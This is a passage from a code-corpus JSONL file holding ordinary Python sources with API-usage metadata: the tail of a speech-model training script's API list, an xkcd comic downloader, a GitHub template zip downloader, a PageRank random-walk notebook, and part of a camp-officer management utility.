"hparams.hparams", "line_number": 628, "usage_type": "name"}, {"api_name": "hparams.hparams.lr_schedule_kwargs", "line_number": 630, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 630, "usage_type": "name"}, {"api_name": "hparams.hparams.max_positions", "line_number": 647, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 647, "usage_type": "name"}, {"api_name": "hparams.hparams.max_positions", "line_number": 652, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 652, "usage_type": "name"}, {"api_name": "hparams.hparams.masked_loss_weight", "line_number": 666, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 666, "usage_type": "name"}, {"api_name": "hparams.hparams.binary_divergence_weight", "line_number": 704, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 704, "usage_type": "name"}, {"api_name": "hparams.hparams.priority_freq", "line_number": 718, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 718, "usage_type": "name"}, {"api_name": "hparams.hparams.sample_rate", "line_number": 718, "usage_type": "attribute"}, {"api_name": "hparams.hparams.priority_freq_weight", "line_number": 722, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 722, "usage_type": "name"}, {"api_name": "hparams.hparams.use_guided_attention", "line_number": 734, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 734, "usage_type": "name"}, {"api_name": "hparams.hparams.guided_attention_sigma", "line_number": 737, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 737, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 738, "usage_type": "call"}, {"api_name": "hparams.hparams.eval_interval", "line_number": 750, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 750, "usage_type": "name"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 757, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 757, "usage_type": "attribute"}, {"api_name": "hparams.hparams.use_guided_attention", "line_number": 772, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 772, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 800, "usage_type": "call"}, {"api_name": "hparams.hparams.save_optimizer_state", "line_number": 802, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 802, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 803, "usage_type": "call"}, {"api_name": "deepvoice3_pytorch.builder", "line_number": 813, "usage_type": "argument"}, {"api_name": "hparams.hparams.builder", "line_number": 813, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 813, "usage_type": "name"}, {"api_name": "hparams.hparams.n_speakers", "line_number": 814, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 814, "usage_type": "name"}, {"api_name": "hparams.hparams.speaker_embed_dim", "line_number": 815, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 815, "usage_type": "name"}, {"api_name": "hparams.hparams.text_embed_dim", "line_number": 817, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 817, "usage_type": "name"}, {"api_name": "hparams.hparams.num_mels", "line_number": 818, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 818, "usage_type": "name"}, {"api_name": "hparams.hparams.fft_size", "line_number": 819, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 819, "usage_type": "name"}, {"api_name": "hparams.hparams.outputs_per_step", "line_number": 820, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 820, "usage_type": "name"}, {"api_name": "hparams.hparams.downsample_step", "line_number": 821, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 821, "usage_type": "name"}, {"api_name": "hparams.hparams.padding_idx", "line_number": 822, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 822, "usage_type": "name"}, {"api_name": "hparams.hparams.dropout", "line_number": 823, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 823, "usage_type": "name"}, {"api_name": "hparams.hparams.kernel_size", "line_number": 824, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 824, "usage_type": "name"}, {"api_name": "hparams.hparams.encoder_channels", "line_number": 825, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 825, "usage_type": "name"}, {"api_name": "hparams.hparams.decoder_channels", "line_number": 826, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 826, "usage_type": "name"}, {"api_name": "hparams.hparams.converter_channels", "line_number": 827, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 827, "usage_type": "name"}, {"api_name": "hparams.hparams.use_memory_mask", "line_number": 828, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 828, "usage_type": "name"}, {"api_name": "hparams.hparams.trainable_positional_encodings", "line_number": 829, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 829, "usage_type": "name"}, {"api_name": "hparams.hparams.force_monotonic_attention", "line_number": 830, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 830, "usage_type": "name"}, {"api_name": "hparams.hparams.use_decoder_state_for_postnet_input", "line_number": 831, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 831, "usage_type": "name"}, {"api_name": "hparams.hparams.max_positions", "line_number": 832, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 832, "usage_type": "name"}, {"api_name": "hparams.hparams.speaker_embedding_weight_std", "line_number": 833, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 833, "usage_type": "name"}, {"api_name": "hparams.hparams.freeze_embedding", "line_number": 834, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 834, "usage_type": "name"}, {"api_name": "hparams.hparams.window_ahead", "line_number": 835, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 835, "usage_type": "name"}, {"api_name": "hparams.hparams.window_backward", "line_number": 836, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 836, "usage_type": "name"}, {"api_name": "hparams.hparams.key_projection", "line_number": 837, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 837, "usage_type": "name"}, {"api_name": "hparams.hparams.value_projection", "line_number": 838, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 838, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 845, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 847, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 897, "usage_type": "call"}, {"api_name": "docopt.docopt", "line_number": 901, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 915, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 915, "usage_type": "call"}, {"api_name": "hparams.hparams.parse_json", "line_number": 937, "usage_type": "call"}, {"api_name": "hparams.hparams", "line_number": 937, "usage_type": "name"}, {"api_name": "hparams.hparams.parse", "line_number": 939, "usage_type": "call"}, {"api_name": "hparams.hparams", "line_number": 939, "usage_type": "name"}, {"api_name": "platform.system", "line_number": 943, "usage_type": "call"}, {"api_name": "hparams.hparams.name", "line_number": 946, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 946, "usage_type": "name"}, {"api_name": "hparams.hparams_debug_string", "line_number": 947, "usage_type": "call"}, {"api_name": "deepvoice3_pytorch.frontend", "line_number": 949, "usage_type": "argument"}, {"api_name": "hparams.hparams.frontend", "line_number": 949, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 949, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 951, "usage_type": "call"}, {"api_name": "nnmnkwii.datasets.FileSourceDataset", "line_number": 954, "usage_type": "call"}, {"api_name": "nnmnkwii.datasets.FileSourceDataset", "line_number": 955, "usage_type": "call"}, {"api_name": "nnmnkwii.datasets.FileSourceDataset", "line_number": 956, "usage_type": "call"}, {"api_name": "hparams.hparams.batch_size", "line_number": 961, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 961, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 965, "usage_type": "call"}, {"api_name": "torch.utils.data", "line_number": 965, "usage_type": "name"}, {"api_name": "hparams.hparams.batch_size", "line_number": 966, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 966, "usage_type": "name"}, {"api_name": "hparams.hparams.num_workers", "line_number": 967, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 967, "usage_type": "name"}, {"api_name": "hparams.hparams.pin_memory", "line_number": 968, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 968, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 970, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 975, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 975, "usage_type": "name"}, {"api_name": "hparams.hparams.initial_learning_rate", "line_number": 976, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 976, "usage_type": "name"}, {"api_name": "hparams.hparams.adam_beta1", "line_number": 977, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 977, "usage_type": "name"}, {"api_name": "hparams.hparams.adam_beta2", "line_number": 977, "usage_type": "attribute"}, {"api_name": "hparams.hparams.adam_eps", "line_number": 978, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 978, "usage_type": "name"}, {"api_name": "hparams.hparams.weight_decay", "line_number": 978, "usage_type": "attribute"}, {"api_name": "hparams.hparams.amsgrad", "line_number": 979, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 979, "usage_type": "name"}, {"api_name": "platform.system", "line_number": 1001, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 1002, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1002, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1004, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1004, "usage_type": "name"}, {"api_name": "tensorboardX.SummaryWriter", "line_number": 1006, "usage_type": "call"}, {"api_name": "hparams.hparams.initial_learning_rate", "line_number": 1011, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 1011, "usage_type": "name"}, {"api_name": "hparams.hparams.checkpoint_interval", "line_number": 1013, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 1013, "usage_type": "name"}, {"api_name": "hparams.hparams.nepochs", "line_number": 1014, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 1014, "usage_type": "name"}, {"api_name": "hparams.hparams.clip_thresh", "line_number": 1015, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 1015, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 1023, "usage_type": "call"}]} +{"seq_id": "9121433617", "text": "\r\nimport requests as R\r\nfrom bs4 import BeautifulSoup \r\nimport os\r\nimport re\r\nimport time\r\nimport urllib.request #下載圖片\r\n\r\ndef get_page(url):\r\n #得到page\r\n headers = {\"user-agent\" : \r\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\"\r\n }\r\n resp = R.get(url, headers = headers)\r\n if resp.status_code != 200:\r\n print(\"NG\")\r\n quit()\r\n return resp.text\r\n\r\ndef download(url,name):\r\n #下載圖片用\r\n urllib.request.urlretrieve(url,\"xkcd\\\\\" + name)\r\n print(\"Processing:%s...\" %name)\r\n time.sleep(1)\r\nif __name__ == \"__main__\":\r\n\r\n number = int(input(\"請輸入下載圖片數量\\n\"))\r\n if not os.path.exists(\"xkcd\"): #判斷資料夾是否存在\r\n os.mkdir(\"xkcd\")\r\n\r\n html = get_page(\"https://xkcd.com/\") #第一次先用https://xkcd.com/ 來找最新網址篇數\r\n pars = BeautifulSoup(html,\"html.parser\")\r\n latest_url = pars.find(\"meta\", property =\"og:url\").get(\"content\") #這裡存放最新的文章篇數\r\n\r\n #利用正規表達法來取得最新數字-----------\r\n rule = re.compile(r\"\\d\\d\\d\\d\") #re\r\n latest_number = rule.search(latest_url)\r\n temp_number = int(latest_number.group())\r\n #---------------------------------\r\n\r\n for i in range(number): #利用下載次數來求文章篇數\r\n temp_number = temp_number - i \r\n #每次都扣i 往前瀏覽 例如: 2565 - 1 = 2564 // 2565 -2 = 2563...\r\n html = get_page(\"https://xkcd.com/\" + str(temp_number)) #接下來用得到的數字開始做迴圈\r\n pars = BeautifulSoup(html,\"html.parser\")\r\n pic_link = pars.find(\"div\", id=\"comic\").find(\"img\").get(\"src\")\r\n pic_link = \"http:\" + pic_link\r\n #取得連結\r\n rule = re.compile(r\"s/(.*)\") #取得圖檔名稱\r\n temp = rule.search(pic_link)\r\n pic_name = temp.group()[2:]\r\n #取得圖檔名稱\r\n download(pic_link, pic_name)\r\n\r\n\r\n\r\n\r\n", "repo_name": "Jason-Huang-S/Python-web-crawler", "sub_path": "下載指定頁數的圖片.py", "file_name": "下載指定頁數的圖片.py", "file_ext": "py", "file_size_in_byte": 1980, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 14, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 22, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 22, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 22, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 29, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 32, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 36, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 45, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "9334562209", "text": "import os\nimport zipfile\nimport requests\nfrom giturlparse import parse\n\nfrom abc import ABCMeta\nfrom abc import abstractmethod\n\nfrom shellfoundry.utilities.template_versions import TemplateVersions\nfrom shellfoundry.exceptions import VersionRequestException\n\n\nclass DownloadedRepoExtractor:\n def __init__(self):\n pass\n\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def extract_to_folder(self, repo_link, folder):\n pass\n\n\nclass ZipDownloadedRepoExtractor (DownloadedRepoExtractor):\n\n def extract_to_folder(self, repo_link, folder):\n with zipfile.ZipFile(repo_link, \"r\") as z:\n infos = z.infolist()\n z.extractall(folder)\n return [info.filename for info in infos]\n\n\nclass RepositoryDownloader:\n def __init__(self, repo_extractor=ZipDownloadedRepoExtractor()):\n self.repo_extractor = repo_extractor\n\n def download_template(self, target_dir, repo_address, branch=None):\n user, repo = self._parse_repo_url(repo_address)\n if not branch:\n branch = self._get_latest_branch((user, repo))\n download_url = self._join_url_all(\"https://api.github.com/repos\", [user, repo, 'zipball', branch])\n archive_path = ''\n try:\n archive_path = self._download_file(download_url, target_dir)\n\n repo_content = self.repo_extractor.extract_to_folder(archive_path, target_dir)\n\n # The first entry is always the root folder by git zipball convention\n root_dir = repo_content[0]\n\n return os.path.join(target_dir, root_dir)\n\n finally:\n if os.path.exists(archive_path):\n os.remove(archive_path)\n\n def _join_url_all(self, url, fragments):\n for frag in fragments:\n url = url + '/' + frag\n return url\n\n def _try_parse_git_url(self, url):\n if url.startswith('git@'):\n parsed_repo = parse(url)\n return True, parsed_repo.owner, parsed_repo.repo\n else:\n return False, None, None\n\n def _try_parse_http_url(self, url):\n if url.startswith('http'):\n fragments = url.split(\"/\")\n return True, fragments[-2], fragments[-1]\n else:\n return False, None, None\n\n def _parse_repo_url(self, url):\n success, user, repo = self._try_parse_git_url(url)\n if not success:\n success, user, repo = self._try_parse_http_url(url)\n\n return user, repo\n\n def _download_file(self, url, directory):\n local_filename = os.path.join(directory, url.split('/')[-1])\n # NOTE the stream=True parameter\n r = requests.get(url, stream=True)\n if r.status_code != requests.codes.ok:\n raise VersionRequestException('Failed to download zip file from {}'.format(url))\n with open(local_filename, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n # f.flush() commented by recommendation from J.F.Sebastian\n return local_filename\n\n def _get_latest_branch(self, repo):\n return next(iter(TemplateVersions(*repo).get_versions_of_template()))\n", "repo_name": "menib/shellfoundry", "sub_path": "shellfoundry/utilities/repository_downloader.py", "file_name": "repository_downloader.py", "file_ext": "py", "file_size_in_byte": 3225, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "abc.ABCMeta", "line_number": 17, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 19, "usage_type": "name"}, {"api_name": "zipfile.ZipFile", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 55, "usage_type": "call"}, {"api_name": "giturlparse.parse", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 86, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 87, "usage_type": "attribute"}, {"api_name": "shellfoundry.exceptions.VersionRequestException", "line_number": 88, "usage_type": "call"}, {"api_name": "shellfoundry.utilities.template_versions.TemplateVersions", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "34065835829", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[10]:\n\n\nimport networkx as nx\nimport random\nimport matplotlib.pyplot as plt\nimport operator\nG=nx.gnp_random_graph(10,0.5,directed=True) #.5 for edge creation prob.\nnx.draw(G,with_labels= True)\nplt.show()\nx=random.choice([i for i in range(G.number_of_nodes())]) #random source node\ndict_counter={}\nfor i in range(G.number_of_nodes()):\n dict_counter[i]=0\ndict_counter[x]=dict_counter[x]+1\nfor i in range(1000000): #we iterate here and wait for convergence of the points distributed\n list_n= list(G.neighbors(x))\n if(len(list_n)==0): #if x is sink(no neighbor)\n x=random.choice([i for i in range(G.number_of_nodes())])\n dict_counter[x]=dict_counter[x]+1\n else:\n x=random.choice(list_n)\n dict_counter[x]=dict_counter[x]+1\np=nx.pagerank(G)\nsorted_p= sorted(p.items(), key= operator.itemgetter(1))\nsorted_rw= sorted(dict_counter.items(), key= operator.itemgetter(1))\nprint(sorted_p)\nprint(sorted_rw)\n#we now match if the order comes in same as like 5-> 3-> ... otherwise increase the iterations\n\n\n# In[25]:\n\n\nimport networkx as nx\nimport random\nimport matplotlib.pyplot as plt\n\ndef add_edges():\n nodes= list(G.nodes())\n for s in nodes:\n for t in nodes:\n if s != t:\n r=random.random()\n if r<0.5:\n G.add_edge(s,t)\n return G\n\ndef ap(G):\n nodes= list(G.nodes())\n p=[]\n for each in nodes:\n p.append(100) #we assign point to each node \n return p\n\ndef distribute_points(G, points):\n nodes= list(G.nodes())\n new_points=[]\n for i in range(len(nodes)):\n new_points.append(0)\n for n in nodes:\n out=list(G.out_edges(n))\n if(len(out)==0):\n new_points=new_points[n]+points[n]\n else:\n share= points[n]/len(out)\n for(src, tgt) in out:\n new_points[tgt]= new_points[tgt]+share\n return new_points\n \ndef keep_distributing(points, G):\n while(1):\n new_points= distribute_points(G, points)\n print(new_points)\n points= new_points\n stop=input(\"press n to stop or any other key to continue\")\n if stop==\"n\":\n break\n else:\n continue\n return new_points\n \ndef rank_by_points(final_points):\n d={}\n for i in range(len(points)):\n d[i]= points[i]\n print(sorted(d.items(), key=lambda f:f[1]))\n \nG=nx.DiGraph() # a directed graph\nG.add_nodes_from([i for i in range(10)])\nG=add_edges()\nnx.draw(G,with_labels= True)\nplt.show()\n#assign points\npoints= ap(G)\n#distribute // convergence\nfinal_points= keep_distributing(points, G)\n#rank by points\nrank_by_points(final_points)\nprint(\"now compare it\")\nresult= nx.pagerank(G)\nprint(sorted(result.items(), key=lambda f:f[1]))\n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "hitiksaini/google-pagerank-algorithm", "sub_path": "How does Google Work.py", "file_name": "How does Google Work.py", "file_ext": "py", "file_size_in_byte": 2822, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "networkx.gnp_random_graph", "line_number": 11, "usage_type": "call"}, {"api_name": "networkx.draw", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 14, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 22, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 25, "usage_type": "call"}, {"api_name": "networkx.pagerank", "line_number": 27, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 28, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 29, "usage_type": "call"}, {"api_name": "random.random", "line_number": 47, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 92, "usage_type": "call"}, {"api_name": "networkx.draw", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "networkx.pagerank", "line_number": 104, "usage_type": "call"}]} +{"seq_id": "70235012328", "text": "\"\"\"\nUtility functions for officers app.\n\"\"\"\nfrom collections import defaultdict\n\nfrom cciw.accounts.models import User\nfrom cciw.cciwmain.models import Camp\nfrom cciw.utils.spreadsheet import ExcelSimpleBuilder\n\n\ndef camp_officer_list(camp: Camp) -> list[User]:\n \"\"\"\n Returns complete list of officers for a camp\n \"\"\"\n return list(camp.officers.all().order_by(\"first_name\", \"last_name\", \"email\"))\n\n\ndef camp_slacker_list(camp: Camp) -> list[User]:\n \"\"\"\n Returns list of officers who have not filled out an application form\n \"\"\"\n from cciw.officers.applications import applications_for_camp\n\n finished_apps_ids = applications_for_camp(camp).values_list(\"officer__id\", flat=True)\n return list(camp.officers.order_by(\"first_name\", \"last_name\", \"email\").exclude(id__in=finished_apps_ids))\n\n\ndef camp_serious_slacker_list(camp: Camp) -> list[User]:\n \"\"\"\n Returns a list of officers who have serious problems in terms\n of submitted applications and references.\n \"\"\"\n # This looks at history - so we find officers who have been on camps before.\n # We also look across all the camps, to catch officers who might go from one\n # camp to the next, never submitting application forms or references. This\n # means the logic is slightly different than 'applications_for_camp', but as\n # this is meant as a warning system it doesn't matter that it doesn't match\n # the logic exactly.\n\n from cciw.cciwmain.models import Camp\n from cciw.officers.models import Application, DBSCheck, Invitation, Reference\n\n officers = [i.officer for i in camp.invitations.all()]\n # We need to allow applications/references for the current year to 'fix' a\n # track record. However, when displaying past problems, don't include the\n # current year.\n relevant_camps = list(Camp.objects.filter(year__lte=camp.start_date.year).order_by(\"-start_date\"))\n\n if len(relevant_camps) == 0:\n return []\n\n latest_camp = relevant_camps[0]\n\n all_invitations = list(\n Invitation.objects.filter(camp__in=relevant_camps, officer__in=officers).select_related(\"camp\", \"officer\")\n )\n all_apps = list(\n Application.objects.filter(finished=True, officer__in=officers, date_saved__lte=latest_camp.start_date)\n )\n\n all_received_refs = list(Reference.objects.select_related(\"referee\").filter(referee__application__in=all_apps))\n\n all_dbss = list(DBSCheck.objects.filter(officer__in=officers))\n\n received_ref_dict = defaultdict(list)\n for ref in all_received_refs:\n received_ref_dict[ref.referee.application_id].append(ref)\n\n # For each officer, we need to build a list of the years when they were on\n # camp but failed to submit an application form.\n\n # If they failed to submit two references, we also need to show them. (If\n # they didn't submit an application form then they will definitely have\n # missing references).\n\n # Dictionaries containing officers as key, and a list of camps as values:\n officer_apps_missing = defaultdict(list)\n officer_apps_present = defaultdict(list)\n officer_refs_missing = defaultdict(list)\n officer_refs_present = defaultdict(list)\n officer_dbss_missing = defaultdict(list)\n officer_dbss_present = defaultdict(list)\n officer_apps_last_good_year = {}\n officer_refs_last_good_year = {}\n officer_dbss_last_good_year = {}\n\n for c in relevant_camps:\n camp_officers = {i.officer for i in all_invitations if i.camp == c}\n camp_applications = [a for a in all_apps if a.could_be_for_camp(c)]\n officers_with_applications = {a.officer for a in camp_applications}\n officers_with_two_references = {a.officer for a in camp_applications if len(received_ref_dict[a.id]) >= 2}\n officers_with_dbss = {dbs.officer for dbs in all_dbss if dbs.could_be_for_camp(c)}\n\n for o in camp_officers:\n if o in officers_with_applications:\n officer_apps_present[o].append(c)\n else:\n officer_apps_missing[o].append(c)\n if o in officers_with_two_references:\n officer_refs_present[o].append(c)\n else:\n officer_refs_missing[o].append(c)\n if o in officers_with_dbss:\n officer_dbss_present[o].append(c)\n else:\n officer_dbss_missing[o].append(c)\n\n # We only care about missing applications if they are not\n # followed by submitted applications i.e. an officer fixes\n # their past record by submitting one application.\n\n def sort_camps(camps):\n camps.sort(key=lambda camp: camp.start_date)\n\n def sort_camps_reverse(camps):\n camps.sort(key=lambda camp: camp.start_date, reverse=True)\n\n def get_missing_and_present_lists(present_dict, missing_dict, last_good_year_dict):\n for officer, camps in present_dict.items():\n if camps:\n sort_camps(camps)\n last_camp_with_item = camps[-1]\n missing_camps = missing_dict[officer]\n new_missing_camps = [c for c in missing_camps if c.start_date > last_camp_with_item.start_date]\n missing_dict[officer] = new_missing_camps\n last_good_year_dict[officer] = last_camp_with_item.year\n\n for officer, camps in missing_dict.items():\n sort_camps_reverse(camps)\n\n # Don't show missing applications/references from current year\n for officer, camps in missing_dict.items():\n missing_dict[officer] = [c for c in camps if c.year < camp.year]\n\n get_missing_and_present_lists(officer_apps_present, officer_apps_missing, officer_apps_last_good_year)\n get_missing_and_present_lists(officer_refs_present, officer_refs_missing, officer_refs_last_good_year)\n get_missing_and_present_lists(officer_dbss_present, officer_dbss_missing, officer_dbss_last_good_year)\n\n tmp1 = [\n (o, officer_apps_missing[o], officer_refs_missing[o], officer_dbss_missing[o])\n for o in (\n set(officer_apps_missing.keys()) | set(officer_refs_missing.keys()) | set(officer_dbss_missing.keys())\n )\n ]\n # Remove empty items:\n tmp1 = [(o, a, r, c) for (o, a, r, c) in tmp1 if len(a) > 0 or len(r) > 0 or len(c) > 0]\n return [\n {\n \"officer\": o,\n \"missing_application_forms\": a,\n \"missing_references\": r,\n \"missing_dbss\": c,\n \"last_good_apps_year\": officer_apps_last_good_year.get(o),\n \"last_good_refs_year\": officer_refs_last_good_year.get(o),\n \"last_good_dbss_year\": officer_dbss_last_good_year.get(o),\n }\n for o, a, r, c in tmp1\n ]\n\n\ndef officer_data_to_spreadsheet(camp: Camp):\n spreadsheet = ExcelSimpleBuilder()\n # Import here to avoid import cycle\n from cciw.officers.applications import applications_for_camp\n\n # All the data we need:\n invites = (\n camp.invitations.all().select_related(\"officer\", \"role\").order_by(\"officer__first_name\", \"officer__last_name\")\n )\n apps = applications_for_camp(camp).prefetch_related(\"qualifications\")\n app_dict = {app.officer.id: app for app in apps}\n\n # Attributes we need\n app_attr_getter = lambda attr: lambda user, inv, app: getattr(app, attr) if app is not None else \"\"\n columns = [\n (\"First name\", lambda u, inv, app: u.first_name),\n (\"Last name\", lambda u, inv, app: u.last_name),\n (\"Email\", lambda u, inv, app: u.email),\n (\"Role\", lambda u, inv, app: inv.role.name if inv.role else \"\"),\n (\"Address\", app_attr_getter(\"address_firstline\")),\n (\"Town\", app_attr_getter(\"address_town\")),\n (\"County\", app_attr_getter(\"address_county\")),\n (\"Post code\", app_attr_getter(\"address_postcode\")),\n (\"Country\", app_attr_getter(\"address_country\")),\n (\"Tel\", app_attr_getter(\"address_tel\")),\n (\"Mobile\", app_attr_getter(\"address_mobile\")),\n (\"Birth date\", app_attr_getter(\"birth_date\")),\n ]\n\n header_row = [h for h, f in columns]\n\n def data_rows():\n for inv in invites:\n user = inv.officer\n app = app_dict.get(user.id)\n row = []\n for header, f in columns:\n row.append(f(user, inv, app))\n yield row\n\n spreadsheet.add_sheet_with_header_row(\"Officers\", header_row, data_rows())\n\n # Qualifications sheet\n spreadsheet.add_sheet_with_header_row(\n \"Qualifications\",\n [\"First name\", \"Last name\", \"Qualification\", \"Date issued\"],\n [\n [a.officer.first_name, a.officer.last_name, q.type.name, q.date_issued]\n for a in apps\n for q in a.qualifications.all()\n ],\n )\n\n spreadsheet.add_sheet_with_header_row(\n \"Dietary Requirements\",\n [\"First name\", \"Last name\", \"Requirements\"],\n [[a.officer.first_name, a.officer.last_name, a.dietary_requirements] for a in apps if a.dietary_requirements],\n )\n return spreadsheet\n", "repo_name": "cciw-uk/cciw.co.uk", "sub_path": "cciw/officers/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 8987, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cciw.cciwmain.models.Camp", "line_number": 11, "usage_type": "name"}, {"api_name": "cciw.accounts.models.User", "line_number": 11, "usage_type": "name"}, {"api_name": "cciw.cciwmain.models.Camp", "line_number": 18, "usage_type": "name"}, {"api_name": "cciw.officers.applications.applications_for_camp", "line_number": 24, "usage_type": "call"}, {"api_name": "cciw.accounts.models.User", "line_number": 18, "usage_type": "name"}, {"api_name": "cciw.cciwmain.models.Camp", "line_number": 28, "usage_type": "name"}, {"api_name": "cciw.cciwmain.models.Camp.objects.filter", "line_number": 47, "usage_type": "call"}, {"api_name": "cciw.cciwmain.models.Camp.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cciw.cciwmain.models.Camp", "line_number": 47, "usage_type": 